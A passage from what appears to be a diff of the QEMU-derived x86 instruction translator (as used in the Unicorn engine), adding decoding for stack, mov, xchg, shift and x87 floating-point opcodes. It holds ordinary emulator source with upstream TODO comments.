//case 0x58 ... 0x5f: /* pop */ + ot = gen_pop_T0(s); + /* NOTE: order is important for pop %sp */ + gen_pop_update(s, ot); + gen_op_mov_reg_v(tcg_ctx, ot, (b & 7) | REX_B(s), *cpu_T[0]); + break; + case 0x60: /* pusha */ + if (CODE64(s)) + goto illegal_op; + gen_pusha(s); + break; + case 0x61: /* popa */ + if (CODE64(s)) + goto illegal_op; + gen_popa(s); + break; + case 0x68: /* push Iv */ + case 0x6a: + ot = mo_pushpop(s, dflag); + if (b == 0x68) + val = insn_get(env, s, ot); + else + val = (int8_t)insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_push_v(s, *cpu_T[0]); + break; + case 0x8f: /* pop Ev */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + ot = gen_pop_T0(s); + if (mod == 3) { + /* NOTE: order is important for pop %sp */ + gen_pop_update(s, ot); + rm = (modrm & 7) | REX_B(s); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + /* NOTE: order is important too for MMU exceptions */ + s->popl_esp_hack = 1 << ot; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + s->popl_esp_hack = 0; + gen_pop_update(s, ot); + } + break; + case 0xc8: /* enter */ + { + int level; + val = cpu_lduw_code(env, s->pc); + s->pc += 2; + level = cpu_ldub_code(env, s->pc++); + gen_enter(s, val, level); + } + break; + case 0xc9: /* leave */ + /* XXX: exception not precise (ESP is updated before potential exception) */ + if (CODE64(s)) { + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_ESP, *cpu_T[0]); + } else if (s->ss32) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_ESP, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EBP); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_ESP, *cpu_T[0]); + } + ot = gen_pop_T0(s); + gen_op_mov_reg_v(tcg_ctx, ot, R_EBP, *cpu_T[0]); + gen_pop_update(s, ot); + break; + case 0x06: /* push es */ + case 0x0e: /* push cs */ + case 0x16: /* push ss */ + case 0x1e: /* push ds */ + if (CODE64(s)) + goto illegal_op; + gen_op_movl_T0_seg(tcg_ctx, b >> 3); + gen_push_v(s, *cpu_T[0]); + break; + case 0x1a0: /* push fs */ + case 0x1a8: /* push gs */ + gen_op_movl_T0_seg(tcg_ctx, (b >> 3) & 7); + gen_push_v(s, *cpu_T[0]); + break; + case 0x07: /* pop es */ + case 0x17: /* pop ss */ + case 0x1f: /* pop ds */ + if (CODE64(s)) + goto illegal_op; + reg = b >> 3; + ot = gen_pop_T0(s); + gen_movl_seg_T0(s, reg, pc_start - s->cs_base); + gen_pop_update(s, ot); + if (reg == R_SS) { + /* if reg == SS, inhibit interrupts/trace. */ + /* If several instructions disable interrupts, only the + _first_ does it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + s->tf = 0; + } + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x1a1: /* pop fs */ + case 0x1a9: /* pop gs */ + ot = gen_pop_T0(s); + gen_movl_seg_T0(s, (b >> 3) & 7, pc_start - s->cs_base); + gen_pop_update(s, ot); + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + + /**************************/ + /* mov */ + case 0x88: + case 0x89: /* mov Gv, Ev */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + /* generate a generic store */ + gen_ldst_modrm(env, s, modrm, ot, reg, 1); + break; + case 0xc6: + case 0xc7: /* mov Ev, Iv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + reg = ((modrm >> 3) & 7) | rex_r; + if (mod != 3) { + if (reg != 0) + goto illegal_op; + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + } else { + if (reg != 0 && reg != 7) + goto illegal_op; + } + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, (modrm & 7) | REX_B(s), *cpu_T[0]); + } + break; + case 0x8a: + case 0x8b: /* mov Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0x8e: /* mov seg, Gv */ + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + if (reg >= 6 || reg == R_CS) + goto illegal_op; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + gen_movl_seg_T0(s, reg, pc_start - s->cs_base); + if (reg == R_SS) { + /* if reg == SS, inhibit interrupts/trace */ + /* If several instructions disable interrupts, only the + _first_ does it */ + if (!(s->tb->flags & HF_INHIBIT_IRQ_MASK)) + gen_helper_set_inhibit_irq(tcg_ctx, cpu_env); + s->tf = 0; + } + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + case 0x8c: /* mov Gv, seg */ + modrm = cpu_ldub_code(env, s->pc++); + reg = (modrm >> 3) & 7; + mod = (modrm >> 6) & 3; + if (reg >= 6) + goto illegal_op; + gen_op_movl_T0_seg(tcg_ctx, reg); + ot = mod == 3 ? dflag : MO_16; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); + break; + + case 0x1b6: /* movzbS Gv, Eb */ + case 0x1b7: /* movzwS Gv, Eb */ + case 0x1be: /* movsbS Gv, Eb */ + case 0x1bf: /* movswS Gv, Eb */ + { + TCGMemOp d_ot; + TCGMemOp s_ot; + + /* d_ot is the size of destination */ + d_ot = dflag; + /* ot is the size of source */ + ot = (b & 1) + MO_8; + /* s_ot is the sign+size of source */ + s_ot = b & 8 ? MO_SIGN | ot : ot; + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + switch (s_ot) { + case MO_UB: + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + case MO_SB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + case MO_UW: + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + default: + case MO_SW: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + break; + } + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, s_ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, d_ot, reg, *cpu_T[0]); + } + } + break; + + case 0x8d: /* lea */ + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + reg = ((modrm >> 3) & 7) | rex_r; + /* we must ensure that no segment is added */ + s->override = -1; + val = s->addseg; + s->addseg = 0; + gen_lea_modrm(env, s, modrm); + s->addseg = val; + gen_op_mov_reg_v(tcg_ctx, ot, reg, cpu_A0); + break; + + case 0xa0: /* mov EAX, Ov */ + case 0xa1: + case 0xa2: /* mov Ov, EAX */ + case 0xa3: + { + target_ulong offset_addr; + + ot = mo_b_d(b, dflag); + switch (s->aflag) { +#ifdef TARGET_X86_64 + case MO_64: + offset_addr = cpu_ldq_code(env, s->pc); + s->pc += 8; + break; +#endif + default: + offset_addr = insn_get(env, s, s->aflag); + break; + } + tcg_gen_movi_tl(tcg_ctx, cpu_A0, offset_addr); + gen_add_A0_ds_seg(s); + if ((b & 2) == 0) { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[0]); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], R_EAX); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } + } + break; + case 0xd7: /* xlat */ + tcg_gen_mov_tl(tcg_ctx, cpu_A0, *cpu_regs[R_EBX]); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_add_tl(tcg_ctx, cpu_A0, cpu_A0, *cpu_T[0]); + gen_extu(tcg_ctx, s->aflag, cpu_A0); + gen_add_A0_ds_seg(s); + gen_op_ld_v(s, MO_8, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, MO_8, R_EAX, *cpu_T[0]); + break; + case 0xb0: case 0xb1: case 0xb2: case 0xb3: + case 0xb4: case 0xb5: case 0xb6: case 0xb7: //case 0xb0 ... 0xb7: /* mov R, Ib */ + val = insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_op_mov_reg_v(tcg_ctx, MO_8, (b & 7) | REX_B(s), *cpu_T[0]); + break; + case 0xb8: case 0xb9: case 0xba: case 0xbb: + case 0xbc: case 0xbd: case 0xbe: case 0xbf: //case 0xb8 ... 0xbf: /* mov R, Iv */ +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + uint64_t tmp; + /* 64 bit case */ + tmp = cpu_ldq_code(env, s->pc); + s->pc += 8; + reg = (b & 7) | REX_B(s); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], tmp); + gen_op_mov_reg_v(tcg_ctx, MO_64, reg, *cpu_T[0]); + } else +#endif + { + ot = dflag; + val = insn_get(env, s, ot); + reg = (b & 7) | REX_B(s); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } + break; + + case 0x91: case 0x92: case 0x93: + case 0x94: case 0x95: case 0x96: case 0x97: //case 0x91 ... 0x97: /* xchg R, EAX */ + do_xchg_reg_eax: + ot = dflag; + reg = (b & 7) | REX_B(s); + rm = R_EAX; + goto do_xchg_reg; + case 0x86: + case 0x87: /* xchg Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + do_xchg_reg: + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + /* for xchg, lock is implicit */ + if (!(prefixes & PREFIX_LOCK)) + gen_helper_lock(tcg_ctx, cpu_env); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + if (!(prefixes & PREFIX_LOCK)) + gen_helper_unlock(tcg_ctx, cpu_env); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } + break; + case 0xc4: /* les Gv */ + /* In CODE64 this is VEX3; see above. */ + op = R_ES; + goto do_lxx; + case 0xc5: /* lds Gv */ + /* In CODE64 this is VEX2; see above. */ + op = R_DS; + goto do_lxx; + case 0x1b2: /* lss Gv */ + op = R_SS; + goto do_lxx; + case 0x1b4: /* lfs Gv */ + op = R_FS; + goto do_lxx; + case 0x1b5: /* lgs Gv */ + op = R_GS; + do_lxx: + ot = dflag != MO_16 ? MO_32 : MO_16; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) + goto illegal_op; + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + /* load the segment first to handle exceptions properly */ + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + gen_movl_seg_T0(s, op, pc_start - s->cs_base); + /* then put the data */ + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + if (s->is_jmp) { + gen_jmp_im(s, s->pc - s->cs_base); + gen_eob(s); + } + break; + + /************************/ + /* shifts */ + case 0xc0: + case 0xc1: + /* shift Ev,Ib */ + shift = 2; + grp2_label: + { + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + op = (modrm >> 3) & 7; + + if (mod != 3) { + if (shift == 2) { + s->rip_offset = 1; + } + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = (modrm & 7) | REX_B(s); + } + + /* simpler op */ + if (shift == 0) { + gen_shift(s, op, ot, opreg, OR_ECX); + } else { + if (shift == 2) { + shift = cpu_ldub_code(env, s->pc++); + } + gen_shifti(s, op, ot, opreg, shift); + } + } + break; + case 0xd0: + case 0xd1: + /* shift Ev,1 */ + shift = 1; + goto grp2_label; + case 0xd2: + case 0xd3: + /* shift Ev,cl */ + shift = 0; + goto grp2_label; + + case 0x1a4: /* shld imm */ + op = 0; + shift = 1; + goto do_shiftd; + case 0x1a5: /* shld cl */ + op = 0; + shift = 0; + goto do_shiftd; + case 0x1ac: /* shrd imm */ + op = 1; + shift = 1; + goto do_shiftd; + case 0x1ad: /* shrd cl */ + op = 1; + shift = 0; + do_shiftd: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + reg = ((modrm >> 3) & 7) | rex_r; + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = rm; + } + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + + if (shift) { + TCGv imm = tcg_const_tl(tcg_ctx, cpu_ldub_code(env, s->pc++)); + gen_shiftd_rm_T1(s, ot, opreg, op, imm); + tcg_temp_free(tcg_ctx, imm); + } else { + gen_shiftd_rm_T1(s, ot, opreg, op, *cpu_regs[R_ECX]); + } + break; + + /************************/ + /* floats */ + case 0xd8: case 0xd9: case 0xda: case 0xdb: + case 0xdc: case 0xdd: case 0xde: case 0xdf: //case 0xd8 ... 0xdf: + if (s->flags & (HF_EM_MASK | HF_TS_MASK)) { + /* if CR0.EM or CR0.TS are set, generate an FPU exception */ + /* XXX: what to do if illegal op ? */ + gen_exception(s, EXCP07_PREX, pc_start - s->cs_base); + break; + } + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = modrm & 7; + op = ((b & 7) << 3) | ((modrm >> 3) & 7); + if (mod != 3) { + /* memory op */ + gen_lea_modrm(env, s, modrm); + + if( (op >= 0x00 && op <= 0x07) || /* fxxxs */ + (op >= 0x10 && op <= 0x17) || /* fixxxl */ + (op >= 0x20 && op <= 0x27) || /* fxxxl */ + (op >= 0x30 && op <= 0x37) ) /* fixxx */ + { + int op1; + op1 = op & 7; + + switch(op >> 4) { + case 0: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_flds_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 1: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_fildl_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 2: + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + gen_helper_fldl_FT0(tcg_ctx, cpu_env, cpu_tmp1_i64); + break; + case 3: + default: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LESW); + gen_helper_fildl_FT0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + } + + gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); + if (op1 == 3) { + /* fcomp needs pop */ + gen_helper_fpop(tcg_ctx, cpu_env); + } + fpu_update_ip(env, pc_start); + } + else if((op == 0x08) || /* flds */ + (op == 0x0a) || /* fsts */ + (op == 0x0b) || /* fstps */ + (op >= 0x18 && op <= 0x1b) || /* fildl, fisttpl, fistl, fistpl */ + (op >= 0x28 && op <= 0x2b) || /* fldl, fisttpll, fstl, fstpl */ + (op >= 0x38 && op <= 0x3b) ) /* filds, fisttps, fists, fistps */ + { + switch(op & 7) { + case 0: + switch(op >> 4) { + case 0: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_flds_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 1: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + gen_helper_fildl_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + case 2: + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + gen_helper_fldl_ST0(tcg_ctx, cpu_env, cpu_tmp1_i64); + break; + case 3: + default: + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LESW); + gen_helper_fildl_ST0(tcg_ctx, cpu_env, cpu_tmp2_i32); + break; + } + break; + case 1: + /* XXX: the corresponding CPUID bit must be tested ! */ + switch(op >> 4) { + case 1: + gen_helper_fisttl_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 2: + gen_helper_fisttll_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + break; + case 3: + default: + gen_helper_fistt_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + break; + } + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + switch(op >> 4) { + case 0: + gen_helper_fsts_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 1: + gen_helper_fistl_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + break; + case 2: + gen_helper_fstl_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + break; + case 3: + default: + gen_helper_fist_ST0(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + break; + } + if ((op & 7) == 3) + gen_helper_fpop(tcg_ctx, cpu_env); + break; + } + fpu_update_ip(env, pc_start); + } + else if(op == 0x0c) /* fldenv mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fldenv(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x0d) /* fldcw mem */ + { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + gen_helper_fldcw(tcg_ctx, cpu_env, cpu_tmp2_i32); + } + else if(op == 0x0e) /* fnstenv mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fstenv(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x0f) /* fnstcw mem */ + { + gen_helper_fnstcw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + } + else if(op == 0x1d) /* fldt mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fldt_ST0(tcg_ctx, cpu_env, cpu_A0); + fpu_update_ip(env, pc_start); + } + else if(op == 0x1f) /* fstpt mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fstt_ST0(tcg_ctx, cpu_env, cpu_A0); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else if(op == 0x2c) /* frstor mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_frstor(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x2e) /* fnsave mem */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fsave(tcg_ctx, cpu_env, cpu_A0, tcg_const_i32(tcg_ctx, dflag - 1)); + } + else if(op == 0x2f) /* fnstsw mem */ + { + gen_helper_fnstsw(tcg_ctx, cpu_tmp2_i32, cpu_env); + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUW); + } + else if(op == 0x3c) /* fbld */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fbld_ST0(tcg_ctx, cpu_env, cpu_A0); + fpu_update_ip(env, pc_start); + } + else if(op == 0x3e) /* fbstp */ + { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fbst_ST0(tcg_ctx, cpu_env, cpu_A0); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else if(op == 0x3d) /* fildll */ + { + tcg_gen_qemu_ld_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + gen_helper_fildll_ST0(tcg_ctx, cpu_env, cpu_tmp1_i64); + fpu_update_ip(env, pc_start); + } + else if(op == 0x3f) /* fistpll */ + { + gen_helper_fistll_ST0(tcg_ctx, cpu_tmp1_i64, cpu_env); + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, s->mem_index, MO_LEQ); + gen_helper_fpop(tcg_ctx, cpu_env); + fpu_update_ip(env, pc_start); + } + else + { + goto illegal_op; + } + } else { + /* register float ops */ + opreg = rm; + + switch(op) { + case 0x08: /* fld sti */ + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fmov_ST0_STN(tcg_ctx, cpu_env, + tcg_const_i32(tcg_ctx, (opreg + 1) & 7)); + break; + case 0x09: /* fxchg sti */ + case 0x29: /* fxchg4 sti, undocumented op */ + case 0x39: /* fxchg7 sti, undocumented op */ + gen_helper_fxchg_ST0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + break; + case 0x0a: /* grp d9/2 */ + switch(rm) { + case 0: /* fnop */ + /* check exceptions (FreeBSD FPU probe) */ + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_fwait(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x0c: /* grp d9/4 */ + switch(rm) { + case 0: /* fchs */ + gen_helper_fchs_ST0(tcg_ctx, cpu_env); + break; + case 1: /* fabs */ + gen_helper_fabs_ST0(tcg_ctx, cpu_env); + break; + case 4: /* ftst */ + gen_helper_fldz_FT0(tcg_ctx, cpu_env); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 5: /* fxam */ + gen_helper_fxam_ST0(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x0d: /* grp d9/5 */ + { + switch(rm) { + case 0: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fld1_ST0(tcg_ctx, cpu_env); + break; + case 1: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldl2t_ST0(tcg_ctx, cpu_env); + break; + case 2: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldl2e_ST0(tcg_ctx, cpu_env); + break; + case 3: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldpi_ST0(tcg_ctx, cpu_env); + break; + case 4: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldlg2_ST0(tcg_ctx, cpu_env); + break; + case 5: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldln2_ST0(tcg_ctx, cpu_env); + break; + case 6: + gen_helper_fpush(tcg_ctx, cpu_env); + gen_helper_fldz_ST0(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + } + break; + case 0x0e: /* grp d9/6 */ + switch(rm) { + case 0: /* f2xm1 */ + gen_helper_f2xm1(tcg_ctx, cpu_env); + break; + case 1: /* fyl2x */ + gen_helper_fyl2x(tcg_ctx, cpu_env); + break; + case 2: /* fptan */ + gen_helper_fptan(tcg_ctx, cpu_env); + break; + case 3: /* fpatan */ + gen_helper_fpatan(tcg_ctx, cpu_env); + break; + case 4: /* fxtract */ + gen_helper_fxtract(tcg_ctx, cpu_env); + break; + case 5: /* fprem1 */ + gen_helper_fprem1(tcg_ctx, cpu_env); + break; + case 6: /* fdecstp */ + gen_helper_fdecstp(tcg_ctx, cpu_env); + break; + default: + case 7: /* fincstp */ + gen_helper_fincstp(tcg_ctx, cpu_env); + break; + } + break; + case 0x0f: /* grp d9/7 */ + switch(rm) { + case 0: /* fprem */ + gen_helper_fprem(tcg_ctx, cpu_env); + break; + case 1: /* fyl2xp1 */ + gen_helper_fyl2xp1(tcg_ctx, cpu_env); + break; + case 2: /* fsqrt */ + gen_helper_fsqrt(tcg_ctx, cpu_env); + break; + case 3: /* fsincos */ + gen_helper_fsincos(tcg_ctx, cpu_env); + break; + case 5: /* fscale */ + gen_helper_fscale(tcg_ctx, cpu_env); + break; + case 4: /* frndint */ + gen_helper_frndint(tcg_ctx, cpu_env); + break; + case 6: /* fsin */ + gen_helper_fsin(tcg_ctx, cpu_env); + break; + default: + case 7: /* fcos */ + gen_helper_fcos(tcg_ctx, cpu_env); + break; + } + break; + case 0x00: case 0x01: case 0x04: case 0x05: case 0x06: case 0x07: /* fxxx st, sti */ + case 0x20: case 0x21: case 0x24: case 0x25: case 0x26: case 0x27: /* fxxx sti, st */ + case 0x30: case 0x31: case 0x34: case 0x35: case 0x36: case 0x37: /* fxxxp sti, st */ + { + int op1; + + op1 = op & 7; + if (op >= 0x20) { + gen_helper_fp_arith_STN_ST0(tcg_ctx, op1, opreg); + if (op >= 0x30) + gen_helper_fpop(tcg_ctx, cpu_env); + } else { + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fp_arith_ST0_FT0(tcg_ctx, op1); + } + } + break; + case 0x02: /* fcom */ + case 0x22: /* fcom2, undocumented op */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + break; + case 0x03: /* fcomp */ + case 0x23: /* fcomp3, undocumented op */ + case 0x32: /* fcomp5, undocumented op */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + case 0x15: /* da/5 */ + switch(rm) { + case 1: /* fucompp */ + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, 1)); + gen_helper_fucom_ST0_FT0(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + gen_helper_fpop(tcg_ctx, cpu_env); + break; + default: + goto illegal_op; + } + break; + case 0x1c: + switch(rm) { + case 0: /* feni (287 only, just do nop here) */ + break; + case 1: /* fdisi (287 only, just do nop here) */ + break; + case 2: /* fclex */ + gen_helper_fclex(tcg_ctx, cpu_env); + break; + case 3: /* fninit */ + gen_helper_fninit(tcg_ctx, cpu_env); + break; + case 4: /* fsetpm (287 only, just do nop here) */ + break; + default: + goto illegal_op; + } + break; + case 0x1d: /* fucomi */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fucomi_ST0_FT0(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x1e: /* fcomi */ + if (!(s->cpuid_features & CPUID_CMOV)) { + goto illegal_op; + } + gen_update_cc_op(s); + gen_helper_fmov_FT0_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); + gen_helper_fcomi_ST0_FT0(tcg_ctx, cpu_env); + set_cc_op(s, CC_OP_EFLAGS); + break; + case 0x28: /* ffree sti */ + gen_helper_ffree_STN(tcg_ctx, cpu_env, tcg_const_i32(tcg_ctx, opreg)); 